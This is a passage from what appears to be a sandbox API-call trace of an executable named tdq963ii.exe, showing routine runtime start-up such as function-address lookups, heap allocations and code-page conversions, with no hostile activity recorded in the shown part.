(hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0097.244] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0097.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0097.246] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0097.247] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0097.248] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0097.248] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0097.248] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0097.248] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0097.248] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0097.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0097.251] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0097.251] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0097.251] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0097.251] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0097.251] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0097.251] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0097.252] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0097.252] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0097.252] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0097.255] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0097.256] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0097.256] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0097.256] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0097.256] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0097.257] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0097.257] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0097.257] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0097.257] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0097.257] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0097.258] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0097.258] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0097.258] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0097.258] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0097.258] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0097.259] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0097.260] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0097.260] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0097.260] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0097.260] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0097.260] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0097.261] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0097.261] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0097.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x99a3040, dwHighDateTime=0x1d68287)) [0097.276] GetCurrentThreadId () returned 0x98c [0097.276] GetCurrentProcessId () returned 0x90c [0097.276] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=21761539325) returned 1 [0097.627] GetProcessHeap () returned 0x530000 [0097.841] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0097.841] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0097.842] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0097.843] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0097.844] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0097.845] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0097.846] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0097.863] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3bc) returned 0x5470b0 [0097.863] GetCurrentThreadId () returned 0x98c [0097.863] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x547478 [0097.863] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x547498 [0097.864] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x195a0e03, hStdError=0x0)) [0097.864] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0097.864] GetFileType (hFile=0x3) returned 0x2 [0098.153] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.153] GetFileType (hFile=0x7) returned 0x2 [0098.154] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.154] GetFileType (hFile=0xb) returned 0x2 [0098.154] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0098.154] GetEnvironmentStringsW () returned 0x547ca0* [0098.155] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb8c) returned 0x548838 [0098.159] FreeEnvironmentStringsW (penv=0x547ca0) returned 1 [0098.159] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0098.159] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x94) returned 0x547ca0 [0098.165] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa0) returned 0x547d40 [0098.165] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x544de0 [0098.169] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x547de8 [0098.169] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6e) returned 0x547e60 [0098.169] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x78) returned 0x53f910 [0098.169] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x547ed8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x547f48 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x547f80 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x547fd0 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x548008 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x546a80 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4a) returned 0x548038 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x53f990 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548090 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x5480c8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1c) returned 0x546aa8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x548100 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x7c) returned 0x5481e0 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x548268 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3a) returned 0x544e28 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x90) returned 0x5482a8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x548340 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548370 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x5483a8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5483e8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548438 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544e70 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x548498 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x82) returned 0x5484b8 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x548548 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x546ad0 [0098.170] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x548580 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5485b8 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548618 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x548678 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544eb8 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5486b0 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x548710 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548740 [0098.171] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8c) returned 0x548778 [0098.171] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548838 | out: hHeap=0x530000) returned 1 [0099.566] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x548810 [0099.566] GetLastError () returned 0x0 [0099.566] SetLastError (dwErrCode=0x0) [0099.566] GetLastError () returned 0x0 [0099.566] SetLastError (dwErrCode=0x0) [0099.566] GetLastError () returned 0x0 [0099.566] SetLastError (dwErrCode=0x0) [0099.566] GetACP () returned 0x4e4 [0099.567] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x220) returned 0x549018 [0099.567] GetLastError () returned 0x0 [0099.567] SetLastError (dwErrCode=0x0) [0099.567] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0099.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0099.569] GetLastError () returned 0x0 [0099.569] SetLastError (dwErrCode=0x0) [0099.569] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.571] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.571] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0099.571] GetLastError () returned 0x0 [0099.571] SetLastError (dwErrCode=0x0) [0099.571] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.571] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.572] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0099.572] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0099.572] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x93\x0fZ\x19äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0099.572] GetLastError () returned 0x0 [0099.572] SetLastError (dwErrCode=0x0) [0099.572] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, 